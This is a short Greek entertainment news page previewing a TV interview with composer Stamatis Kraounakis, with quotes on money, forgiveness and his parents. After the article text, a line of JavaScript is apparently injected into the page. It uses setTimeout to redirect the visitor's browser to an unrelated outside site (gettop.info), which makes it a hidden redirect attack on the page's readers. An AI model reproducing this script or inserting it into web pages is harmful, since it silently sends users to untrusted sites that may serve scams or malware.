Κραουνάκης: Αντί να τρελαίνεσαι κυνηγώντας λεφτά, να φέρεσαι σαν μελλοθάνατος

0
15

 

O Σταμάτης Κραουνάκης είναι, χωρίς αμφιβολία, ένας από τους σημαντικότερους συνθέτες των τελευταίων 35 χρόνων. Ταυτόχρονα, όμως, είναι ένας άνθρωπος με άποψη για την πολιτική την κοινωνική πρααγματικότητα.

Την προσεχή Κυριακή 8 Ιανουαρίου ξεδιπλώνει τα σημαντικότερα κομμάτια της ζωής του, στην εκπομπή της Έλενας Κατρίτση, στις 4 το απόγευμα.

«Πιστεύω ότι η καλύτερη λύση, αντί να τρελαίνεσαι κυνηγώντας λεφτά, είναι να συμπεριφέρεσαι σαν μελλοθάνατος… Να απολαμβάνεις κάθε μέρα, σαν να είναι η τελευταία», τονίζει χαρακτηριστικά.

Τα τραγούδια του μάς έχουν κάνει να διασκεδάσουμε, να κλάψουμε, να ερωτευτούμε, να ταξιδέψουμε. Τι λέει για όσους τον απογοητεύουν;

«Θεωρώ ότι είμαι βαθύτατα σεμνός άνθρωπος και τη στιγμή που η συμπεριφορά κάποιου θα με υποχρεώσει να του υπενθυμίσω ποιος είμαι, αυτομάτως τον διαγράφω. Η καρδιά μου μπορεί να συγχωρήσει αλλά δεν ξαναγυρνάει πίσω. Το “σπίτι” δεν θα το ξανανοίξω. Και μιλάω για το “σπίτι της καρδιάς μου”…»

Ο δημοφιλής καλλιτέχνης αναπολεί προσωπικές στιγμές που τον έχουν σημαδέψει: «Ο μπαμπάς μου ήταν ένας φαρσέρ. Ένας ευφυής φαρσέρ  ακόμα και με την ίδια τη ζωή… Δεν είχε έρθει ποτέ να με δει… Η μάνα μου ήταν πιο κοινωνική και ερχόταν… Ο πατέρας μου όμως ποτέ. Ήταν έτσι το στυλ του, δεν το έκανε επίτηδες…».

Σίγουρα θα είναι συνέντευξη με μεγάλο ενδιαφέρον…

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here